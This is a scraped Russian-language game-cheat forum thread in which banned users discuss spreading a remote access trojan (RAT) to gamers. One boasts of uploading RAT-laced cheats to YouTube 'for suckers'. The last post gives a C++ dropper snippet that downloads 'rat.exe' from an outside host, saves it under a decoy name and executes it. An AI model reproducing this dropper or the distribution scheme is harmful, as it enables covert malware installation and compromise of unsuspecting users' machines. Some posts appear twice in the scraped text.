Qukallon Забанен Забаненный Забаненный Статус Оффлайн Регистрация 26 Ноя 2017 Сообщения 478 Реакции 47 12 Мар 2020 #1 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. короче, хотите довнлоадер в длл? *блять я потом длл с югейма качать не буду :D*
sinister09 Забаненный S Забаненный Статус Оффлайн Регистрация 24 Дек 2019 Сообщения 204 Реакции 26 12 Мар 2020 #2 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. да
Qukallon Забанен Забаненный Забаненный Статус Оффлайн Регистрация 26 Ноя 2017 Сообщения 478 Реакции 47 12 Мар 2020 #3 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. sinister09 написал(а): да Нажмите для раскрытия... а потом в "Читы для CSGO" тема "BEST FREE HACK LEGIT onetaps onetap BY LOX EBANIY WITH RATNIK"
sinister09 написал(а): да Нажмите для раскрытия... а потом в "Читы для CSGO" тема "BEST FREE HACK LEGIT onetaps onetap BY LOX EBANIY WITH RATNIK"
sinister09 Забаненный S Забаненный Статус Оффлайн Регистрация 24 Дек 2019 Сообщения 204 Реакции 26 12 Мар 2020 #4 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. Qukallon написал(а): а потом в "Читы для CSGO" тема "BEST FREE HACK LEGIT onetaps onetap BY LOX EBANIY WITH RATNIK" Нажмите для раскрытия... да не, я на ютуб лью для лошков, просто ратник в инжекторе уже не так дает приток юзеров
Qukallon написал(а): а потом в "Читы для CSGO" тема "BEST FREE HACK LEGIT onetaps onetap BY LOX EBANIY WITH RATNIK" Нажмите для раскрытия... да не, я на ютуб лью для лошков, просто ратник в инжекторе уже не так дает приток юзеров
detour devcore alpha Пользователь Пользователь Статус Оффлайн Регистрация 23 Май 2018 Сообщения 159 Реакции 64 12 Мар 2020 #5 Самая простая хуйня(код хуета, не нужно доёбываться), написан в блокноте за 1 минуту C++: Expand Collapse Copy std::string downlink, namefile; HRESULT hr; downlink = "http://shit.ru/rat.exe"; namefile = "C:/LittlePony.exe"; hr = URLDownloadToFile(0, downlink.c_str(), namefile.c_str(), 0, 0); if (hr == S_OK) system("Start C:/LittlePony.exe"); Последнее редактирование: 12 Мар 2020
Самая простая хуйня(код хуета, не нужно доёбываться), написан в блокноте за 1 минуту C++: Expand Collapse Copy std::string downlink, namefile; HRESULT hr; downlink = "http://shit.ru/rat.exe"; namefile = "C:/LittlePony.exe"; hr = URLDownloadToFile(0, downlink.c_str(), namefile.c_str(), 0, 0); if (hr == S_OK) system("Start C:/LittlePony.exe");